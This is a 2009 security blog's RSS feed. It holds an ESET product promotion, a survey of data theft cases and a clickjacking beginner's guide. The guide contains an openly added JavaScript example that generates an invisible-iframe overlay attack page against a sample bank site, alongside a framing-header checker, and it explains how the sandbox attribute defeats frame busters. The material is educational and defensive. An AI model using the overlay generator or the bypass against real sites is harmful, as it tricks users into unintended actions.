<p>ESET&#8217;s new detection and diagnostic features (one shown above) safeguard users from deceptive forms of malware by digging deeper into the operating system, files and encrypted browser traffic to identify and eliminate hidden malware threats. The latest version also includes advanced self-defense technology that protects against malware designed to disable antivirus or anti-malware solutions, leaving the user completely unprotected. Together, these new features enable consumers and businesses to proactively block most new malware attacks before they can compromise systems to damage or steal data.</p>
<p>ESET NOD32 Antivirus 4 and ESET Smart Security 4 Business Editions also feature a full-range of management capabilities. These include support for high-end databases, fine-grained control of endpoint security, and even greater scalability for large, dispersed networks. ESET Business Editions include version 3.0 of ESET&#8217;s Remote Administrator, which enables businesses to remotely deploy and manage ESET software. New Statistics will help admins and users see trends in infection on the machine.</p>
<p><img class="aligncenter size-full wp-image-75" title="Eset Chart" src="http://www.michaelmknight.co.uk/wp-content/uploads/2009/03/eset2.jpg" alt="Eset Chart" width="512" height="376" /></p>
<p>ESET NOD32 Antivirus 4 and ESET Smart Security 4&#8217;s new, industry-first security features include:</p>
<ul>
<li>Advanced Archive Scanning - This new feature makes ESET&#8217;s consumer products the first to allow experienced users to fully customize scanning to do a &#8216;deep dive&#8217; of archive files created with popular compression formats, including .RAR, .ZIP and others. Comprehensive controls allow users to define archive scanning with scanning depth, maximum scan time and maximum file size.</li>
<li>Removable Media Access Control - Gives consumers removable media security for USB flash drives and CDs, protection previously extended only to businesses. The feature gives administrators the ability to allow or block mounting of removable media. If removable media is allowed, dangerous files like AUTORUN.INF are scanned for threats.</li>
<li>ESET SysInspector - Newly integrated into ESET NOD32 Antivirus 4 and ESET Smart Security 4, this powerful system diagnostics tool quickly discovers hidden/potentially dangerous rootkits without running a full antivirus scan. It can also reveal hidden changes to the operating system, web browser, registry and applications. The scan results are standardized and can be reviewed by IT personnel, speeding up malware analysis and removal.</li>
<li>ESET SysRescue - Enables users to diagnose and recover compromised systems more easily. Customers build their own system rescue CDs, which can be used to clean up and repair systems compromised by malware without re-imaging the system.</li>
</ul>
<p><img class="aligncenter size-full wp-image-76" title="New Features" src="http://www.michaelmknight.co.uk/wp-content/uploads/2009/03/eset3.jpg" alt="New Features" width="512" height="376" /></p>
<p>With ESET NOD32 Antivirus 4 and ESET Smart Security 4, the company also adds the following additional features to further improve threat prevention, detection and management:</p>
<ul>
<li>Business-class Interoperability and Management - ESET includes powerful features to integrate into multi-layer security environments. Enhanced reporting, support for Cisco NAC, removable media control and improved policy authoring simplify deployment and ongoing management, with improved interoperability.</li>
<li>Power Conservation - Already the most efficient and lightweight anti-malware products on the market, ESET NOD32 Antivirus 4 and ESET Smart Security 4 go one step further by automatically adjusting performance on laptops to maximize battery life without compromising security.</li>
<li>Improved Self-defense Technology - ESET software features improved defenses against disabling of the antivirus system by malware or unauthorized users, among other things by restricting changes to ESET&#8217;s processes and registry entries to authenticated users.</li>
<li>User-friendly Interface - Numerous enhancements to the GUI make the product even easier to use. Among many enhancements, notifications are disabled automatically when full-screen applications like presentations, games or video are running, and a new non-graphical user interface allows disabled and visually-impaired users to easily interact with the software using screen readers and other assistive technologies.</li>
</ul>
<p>For a full list of ESET NOD32 Antivirus 4 and ESET Smart Security 4 features, please visit <a title="Eset Website" href="http://www.eset.com/products/" target="_blank">http://www.eset.com/products/</a>.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.michaelmknight.co.uk/2009/03/73/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Data Theft &#8211; Who has your data?</title>
		<link>http://www.michaelmknight.co.uk/2009/01/data-theft-who-has-your-data/</link>
		<comments>http://www.michaelmknight.co.uk/2009/01/data-theft-who-has-your-data/#comments</comments>
		<pubDate>Sun, 18 Jan 2009 19:20:47 +0000</pubDate>
		<dc:creator>Mike</dc:creator>
				<category><![CDATA[Featured]]></category>
		<category><![CDATA[Forensic]]></category>
		<category><![CDATA[Identity Theft]]></category>
		<category><![CDATA[Windows]]></category>
		<category><![CDATA[Advice]]></category>
		<category><![CDATA[Data]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Theft]]></category>

		<guid isPermaLink="false">http://michaelmknight.co.uk/?p=12</guid>
		<description><![CDATA[Data theft is, quite simply, the unauthorised copying or removal of confidential information from a business or other large enterprise. It can take the form of ID-related theft (the theft of customer records) or the theft of a company’s proprietary information or intellectual property.
ID Data Theft
ID-related data theft ...]]></description>
			<content:encoded><![CDATA[<p>Data theft is, quite simply, the unauthorised copying or removal of confidential information from a business or other large enterprise. It can take the form of <strong>ID-related theft</strong> (the theft of customer records) or the theft of a company’s proprietary information or intellectual property.</p>
<p><strong>ID Data Theft</strong></p>
<p>ID-related data theft occurs when customer records are stolen or illegally copied. The information stolen typically includes customers’ names, addresses, phone numbers, usernames, passwords and PINs, account and credit card numbers, and, in some instances, Social Security numbers. When transmitted or sold to lower-level criminals, this information can be used to commit all manner of <strong>identity fraud</strong>.</p>
<p>A single data theft can affect large numbers of individual victims. There are many examples to cite.</p>
<p>Let’s start here in England. In January, 2008, two laptop PCs were stolen from Brent’s Central Middlesex Hospital. Each laptop contained hundreds of confidential patient records. Not a large theft (389 records in all), but one particularly disconcerting to the patients whose personal data were compromised.</p>
<p>Then there was the case of the Wilkes-Barre driver’s license centre in Hanover, PA, which was broken into in late November, 2006. In addition to assorted office supplies and materials, the thief got away with a computer containing driver’s license information for more than 11,000 citizens.</p>
<p>Not even those companies charged with keeping our data safe are immune from data theft. For example, ChoicePoint, Inc., is a company that collects personal and financial information on millions of computers. In February, 2005, ChoicePoint reported that it had suffered a security breach and inadvertently sold personal information on 145,000 people to a criminal enterprise. Oops!</p>
<p><span id="more-12"></span>A much larger theft occurred in October, 2007, when the financial institution GE Money discovered that a computer tape containing information on 650,000 J.C. Penney customers had gone missing. Although not yet officially confirmed as a theft (it was just “missing”), the tape in question included more than 150,000 Social Security numbers.</p>
<p>Retailers store a lot of valuable data about their customers, which makes them a prime target of data thieves. Thus the story of shoe retailer DSW, which in June, 2005, had 1.4 million customer records stolen. Among those customers affected was then-FTC chairwoman Deborah Platt Majoras—a nice little irony for those that care.</p>
<p>Of course, data theft isn’t limited to the retail sector. Witness the U.S. Department of Veterans Affairs, which had the home of one of its employees burglarized in May of 2006. Stolen in the burglary was a laptop computer and external disk drive that contained the Social Security numbers of about 26.5 million veterans. That was a big breach—but the story has a happy ending. Thanks to some excellent police work, the hard drive was eventually recovered; it was later determined that the sensitive data had not been accessed.</p>
<p>An even bigger breach was the June, 2005, “security incident” reported by Atlanta-based payment processor CardSystems Solutions. The company handles payments for all the major credit cards, including MasterCard, Visa, American Express, and Discover. Intruders used malicious software code to breach the company’s systems, exposing more than 40 million credit card accounts to potential fraud. Fortunately, only about 200,000 of these accounts were found to be actually stolen, but the FBI was still called in to investigate.</p>
<p>But all these incidents pale compared to the largest reported case of data theft on record. In December, 2006, the TJX Companies (parent to T.J. Maxx, Marshalls, and other retailers) reported a massive computer breach on that part of its network that handles credit card, debit card, check, and merchandise transactions. It appears that hackers made off with more than 94 million records from customers in the U.S. and abroad.</p>
<p>Take a look at that last case again. A single data theft compromised the identities of an estimated 94 million individuals. That’s just an incredible number—and indicative of the impact of this type of computer crime.</p>
<p><strong>NOTE: </strong>For what it’s worth, TJX disputes the 94 million number, which comes from a group of banks suing the company over the breach. The company says that only 45.7 million records were stolen—which is still a very big deal.</p>
<p><strong>Non-ID Data Theft</strong></p>
<p>Customers’ records aren’t the only kind of data that can be stolen from a large organization. Companies of all sorts are hosts to various types of confidential information; this information, if accessed by a competitor, could often lead to a diminishment of the company’s position in the marketplace.</p>
<p>Non-ID data theft occurs when an employee makes one or more copies of a company’s confidential information and then either uses that information for his own personal purposes or transmits it to a competitor for the competitor’s use. However it’s done, this is a theft of the business’ intellectual property, every bit as harmful as a theft of money or equipment.</p>
<p>What kind of information are we talking about? A company’s confidential information includes its employee records, contracts with other firms, financial reports, marketing plans, new product specifications, and so on. Imagine you’re a competitor who gets hold of a company’s plans for an upcoming product launch; with knowledge beforehand, you can create your own counter-launch to blunt the impact of the other company’s new product. A little inside information can be extremely valuable—and damaging for the company from which it was stolen.</p>
<p><strong>NOTE: </strong>One notable example of non-ID theft occurred in 2006, when three Coca-Cola employees attempted to steal the secret formula for Coke. They tried to sell the trade secret to rival PepsiCo; unfortunately for them, Pepsi contacted Coca-Cola management, who alerted the FBI. The Feds used this information to conduct a sting operation that landed all three culprits in the big house.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.michaelmknight.co.uk/2009/01/data-theft-who-has-your-data/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Clickjacking: A beginners guide</title>
		<link>http://www.michaelmknight.co.uk/2009/01/clickjacking-a-beginners-guide/</link>
		<comments>http://www.michaelmknight.co.uk/2009/01/clickjacking-a-beginners-guide/#comments</comments>
		<pubDate>Sun, 18 Jan 2009 19:12:26 +0000</pubDate>
		<dc:creator>Mike</dc:creator>
				<category><![CDATA[Notices]]></category>
		<category><![CDATA[Advice]]></category>
		<category><![CDATA[Attack]]></category>
		<category><![CDATA[Clickjacking]]></category>
		<category><![CDATA[Forensics]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://michaelmknight.co.uk/?p=6</guid>
		<description><![CDATA[Clickjacking is a form of client-side, web-based attack in which the attacker tricks the victim into clicking areas of disguised/obfuscated HTML elements, such as the IFRAME, APPLET, OBJECT, or other HTML elements that can display externally loaded resources. The clickjacking technique aims to circumvent the stringent security policies of the ...]]></description>
			<content:encoded><![CDATA[<p>Clickjacking is a form of client-side, web-based attack in which the attacker tricks the victim into clicking areas of disguised/obfuscated HTML elements, such as the IFRAME, APPLET, OBJECT, or other HTML elements that can display externally loaded resources. The clickjacking technique aims to circumvent the stringent security policies of the browser and all of its components by forcing the user to perform the necessary malicious actions on behalf of the attacker—without realizing that he or she is under an attack.</p>
<p>The clickjacking technique is an old form of attack that was reincarnated recently with help from Jeremiah Grossman and Robert (rsnake) Hansen, two researchers known for several discoveries of web and client-side (more specifically, browser-related) vulnerabilities. Ever since Grossman and Hansen&#8217;s public statement about their finding, the clickjacking technique has been discussed in full on several niche blogs and information security resources online, including <a onclick="newwindow(this)" href="http://ha.ckers.org/">ha.ckers.org</a>, <a onclick="newwindow(this)" href="http://hackademix.net/">hackademix.net</a> and <a onclick="newwindow(this)" href="http://www.gnucitizen.org/">GNUCITIZEN</a>.</p>
<p>In this article, we&#8217;ll look into what clickjacking is and what you need to do to protect yourself as a web application developer and as a user.</p>
<h4>What Is Clickjacking?</h4>
<p>The clickjacking technique falls into the category of graphical user interface (GUI) attacks. Another attack in the same category is the infamous <a onclick="newwindow(this)" href="http://www.mozilla.org/security/announce/2008/mfsa2008-02.html" onclick="return TrackClick('http%3A%2F%2Fwww.mozilla.org%2Fsecurity%2Fannounce%2F2008%2Fmfsa2008-02.html','file-input+focus-stealing+bug')">file-input focus-stealing bug</a>, with all of its variations, which allows an attacker to steal any file from the filesystem when the victim is tricked into typing characters into a seemingly harmless text field. Clickjacking is also what security researchers call a design bug: it is possible because of several design limitations of the browser, not because of a single coding error. Design bugs are difficult to fix because they usually require changing the affected system&#8217;s design, which is rarely trivial. Very often, design bugs stay unfixed.</p>
<p>To understand how clickjacking works, consider the following example. You visit your Facebook account. On your dashboard is a notification that one of your friends wants to share a new story with you, so you follow the link inside her message. Once you click the link, a new tab opens inside your browser, displaying a strange but rather harmless-looking message. The page simply asks whether you&#8217;d like to use AJAX in order to preview the content of the page, as it will improve your user experience. There&#8217;s only one button, so you hurry to click it and move on.</p>
<p>Game over—you&#8217;ve been clickjacked! The longer you stay on this page, the more auditory and visual data will be retrieved from your current surroundings, via your microphone and camera. You&#8217;ve been cyber-bugged.</p>
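<p>To make the mechanism above concrete, here is an added example (it is not code from the original post): a function that emits the kind of overlay page an attacker would host, and a checker that reads the headers of a target response and decides whether the page can be framed from an attacker&#8217;s origin at all. The checker assumes the X-Frame-Options response header and the Content-Security-Policy frame-ancestors directive, which are the header-based defences browsers later standardised and which the post does not describe. The origins bank.example, evil.example and partner.example, and every header value in the samples, are constructed for the demonstration.</p>

```javascript
'use strict';
// Added example, not code from the original post. All origins, URLs and
// header values below are constructed for illustration.

// --- 1. The attack page --------------------------------------------------
// A decoy button the victim wants to click, with the target page loaded in an
// invisible iframe on top of it. The frame is shifted so that the target's
// sensitive control (at targetX/targetY inside the framed page) sits exactly
// under the decoy: opacity:0 hides the frame, z-index keeps it on top, so the
// click lands in the framed page, not on the decoy.
function buildOverlayPage(victimUrl, targetX, targetY, decoyX = 100, decoyY = 100) {
  return [
    '<!doctype html><html><body>',
    `<button style="position:absolute;left:${decoyX}px;top:${decoyY}px;">Use AJAX to preview</button>`,
    `<iframe src="${victimUrl}" scrolling="no" style="position:absolute;` +
      `left:${decoyX - targetX}px;top:${decoyY - targetY}px;width:1024px;height:768px;` +
      'opacity:0;z-index:2;border:0;"></iframe>',
    '</body></html>',
  ].join('\n');
}

// --- 2. Can the target be framed at all? ---------------------------------
// Evaluates the two header-based defences: X-Frame-Options (RFC 7034) and the
// CSP frame-ancestors directive. Browsers that understand frame-ancestors
// ignore X-Frame-Options when both are present, so CSP is checked first.
function originOf(url) {
  const u = new URL(url);
  return `${u.protocol}//${u.host}`;       // scheme://host[:port]
}

// One CSP source expression ('self', https:, https://*.partner.example, ...)
// tested against the framing origin.
function sourceMatches(expr, framerOrigin, victimOrigin) {
  const e = expr.toLowerCase();
  if (e === "'none'") return false;
  if (e === "'self'") return framerOrigin === victimOrigin;
  if (e === '*') return true;
  const f = new URL(framerOrigin);
  if (/^[a-z][a-z0-9+.-]*:$/.test(e)) return f.protocol === e;   // scheme-source
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([^:/*]+)(?::(\d+|\*))?$/.exec(e); // host-source
  if (!m) return false;                                          // unparseable: matches nothing
  const [, scheme, wildcard, host, port] = m;
  if (scheme && f.protocol !== scheme + ':') return false;
  // Without an explicit scheme the framer must use the target's scheme (or https).
  if (!scheme && f.protocol !== new URL(victimOrigin).protocol && f.protocol !== 'https:') return false;
  if (!(wildcard ? f.hostname.endsWith('.' + host) : f.hostname === host)) return false;
  if (port === undefined) return f.port === '';                  // no port given: default port only
  const framerPort = f.port || (f.protocol === 'https:' ? '443' : '80');
  return port === '*' || port === framerPort;
}

function canBeFramed(headers, victimUrl, framerOrigin) {
  const h = {};
  for (const [k, v] of Object.entries(headers)) h[k.toLowerCase()] = v;
  const victimOrigin = originOf(victimUrl);

  const csp = h['content-security-policy'] || '';
  const fa = csp.split(';').map(d => d.trim()).find(d => /^frame-ancestors\b/i.test(d));
  if (fa) {
    const sources = fa.split(/\s+/).slice(1);
    return sources.some(s => sourceMatches(s, framerOrigin, victimOrigin)); // empty list matches nothing
  }

  const xfo = h['x-frame-options'];
  if (xfo === undefined) return true;                 // no framing policy at all
  const values = [...new Set(xfo.split(',').map(v => v.trim().toUpperCase()))];
  if (values.length > 1) return false;                // conflicting values: Chromium and Firefox refuse to frame
  const v = values[0];
  if (v === 'DENY') return false;
  if (v === 'SAMEORIGIN') return framerOrigin === victimOrigin;
  // ALLOW-FROM was only honoured by old IE/Firefox; current browsers drop the
  // whole header for it, as they do for any other unrecognised value.
  return true;
}

// --- 3. Constructed sample responses ------------------------------------
const VICTIM = 'https://bank.example/settings/webcam';
const ATTACKER = 'https://evil.example';
const SAMPLES = {
  unprotected:   {},
  xfoDeny:       { 'X-Frame-Options': 'DENY' },
  xfoSameOrigin: { 'X-Frame-Options': 'SAMEORIGIN' },
  xfoTypo:       { 'X-Frame-Options': 'DENIED' },                // misspelt value is silently ignored
  cspNone:       { 'Content-Security-Policy': "default-src 'self'; frame-ancestors 'none'" },
  cspPartner:    { 'Content-Security-Policy': "frame-ancestors 'self' https://*.partner.example" },
  cspBeatsXfo:   { 'X-Frame-Options': 'DENY', 'Content-Security-Policy': 'frame-ancestors *' },
};

// Returns { sampleName: true if framerOrigin can embed the victim page }.
function audit(framerOrigin = ATTACKER) {
  const result = {};
  for (const [name, headers] of Object.entries(SAMPLES)) {
    result[name] = canBeFramed(headers, VICTIM, framerOrigin);
  }
  return result;
}

console.log(buildOverlayPage(VICTIM, 412, 305));
console.log(audit());
```

<p>Run it with node; the audit prints true only for the unprotected response, the misspelt X-Frame-Options value and the CSP that overrides a DENY with <code>frame-ancestors *</code>. The script-based defence of the period, a frame buster such as <code>if (top !== self) top.location = self.location;</code>, runs inside the framed page and can be neutralised by an attacker who loads the frame with the <code>sandbox</code> attribute and withholds top-navigation, which is why the header check above is the one worth automating.</p>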
]]></content:encoded>
			<wfw:commentRss>http://www.michaelmknight.co.uk/2009/01/clickjacking-a-beginners-guide/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
